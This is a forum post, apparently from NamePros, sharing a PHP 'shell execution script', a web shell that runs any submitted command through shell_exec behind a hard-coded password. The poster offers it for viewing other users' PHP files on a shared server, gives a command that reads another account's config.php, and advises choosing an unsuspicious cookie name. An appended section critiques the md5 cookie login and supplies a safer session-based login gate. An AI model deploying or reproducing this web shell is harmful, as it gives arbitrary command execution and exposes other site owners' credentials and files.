Shell execution script

unclekyky

just a really simple, somewhat pointless, script that _can_ be used to view other people's PHP files (on the same server).

I'm sharing it to demonstrate a simple authentication method, highlighting PHP files, and using shell_exec.

some useful Linux shell commands are:
ls /home/bob/public_html/
cat /home/bob/public_html/config.php

the script should work as is with the password "pass" (no quotes).
PHP:
<?php
// what is the password?
$pass = 'pass';
// cookie name - consider changing this to something that people won't suspect
$cookie_name = 'wjcookie';
// md5() the password
$md5_pass = md5($pass);

// checks to see if the cookie is set
if (!isset($_COOKIE[$cookie_name]))
{
	//if the cookie isn't set and the form hasn't been submitted: echo the form
	if (!isset($_POST['conf']))
	{
		echo "Password: <form action='{$_SERVER['PHP_SELF']}' method='post'>
				<input type='password' name='password'><br />
				<input type='hidden' name='conf'>
				<input type='submit'>
				</form>";
		die();
	}
	//if the cookie isn't set and the form has been submitted: check to see if the passwords match
	else 
	{
		if ($_POST['password'] == $pass)
		{
			setcookie($cookie_name, $md5_pass, time()+3600, '/');
		}
		else 
		{
			die('Wrong password.');
		}
	}
}
// if the cookie is set but the passwords don't match, then die
if (isset($_COOKIE[$cookie_name]))
{
	if ($_COOKIE[$cookie_name] != $md5_pass)
	{
		die("Invalid cookie information.");
	}
}
// if the passwords in the cookie match echo the form for the shell command
echo "<h2>Shell Execution Script</h2>
		<form method='post' action='{$_SERVER['PHP_SELF']}'>
		<input type='text' name='input' size='90'><br />
		<input type='submit'>
		</form>
		<br />";
// die if the form hasn't been submitted
if (!isset($_POST['input']))
{
	die();
}
// get the output from the command that was executed
$output = shell_exec($_POST['input']);
// this checks to see if the file is PHP then highlights it.
// the "?" must be escaped, otherwise "<?" means "optional <" and the pattern matches any "php"
if (preg_match('/<\?php/i', $output) || preg_match('/\.php/i', $_POST['input']))
{
	highlight_string($output);
	die();
}
// if not PHP then it echos it out to the screen
echo nl2br(htmlspecialchars($output));
// command wasn't successful
if ($output == NULL)
{
	echo "No output.";
}
?>
 
The views expressed on this page by users and staff are their own, not those of NamePros.
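The authentication method in the post sets the cookie to md5($pass) and compares it with a loose `!=`, so the cookie value works as the password itself for anyone who reads it. The same login gate using a server-side session and password_verify() is shown here as an added example, not the original poster's code; the function name `require_login`, the `PASSWORD_HASH` placeholder, and the assumptions of PHP 7.3+ and an HTTPS site are mine.

```php
<?php
// Added example, not the original poster's code.
// Store only a hash, generated once offline with:
//   php -r 'echo password_hash("your-password", PASSWORD_DEFAULT), PHP_EOL;'
// Placeholder value below; replace it with the generated hash.
const PASSWORD_HASH = '<output of password_hash()>';

function require_login(): void
{
    // Session cookie: hidden from JavaScript, sent over HTTPS only, never cross-site.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // assumption: the site is served over HTTPS
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();

    // The cookie carries only a random session id, never the password or its hash.
    if (!empty($_SESSION['authenticated'])) {
        return;
    }

    $is_post = $_SERVER['REQUEST_METHOD'] === 'POST';
    if ($is_post && isset($_POST['password']) && is_string($_POST['password'])
        && password_verify($_POST['password'], PASSWORD_HASH)) {
        session_regenerate_id(true);   // new id after login prevents session fixation
        $_SESSION['authenticated'] = true;
        return;
    }

    if ($is_post) {
        http_response_code(401);
    }
    // PHP_SELF can contain user-supplied path info, so escape it before output.
    $action = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    echo "<form action='{$action}' method='post'>
          Password: <input type='password' name='password'><br />
          <input type='submit'>
          </form>";
    echo $is_post ? 'Wrong password.' : '';
    exit;
}

require_login();
echo 'Authenticated.';
```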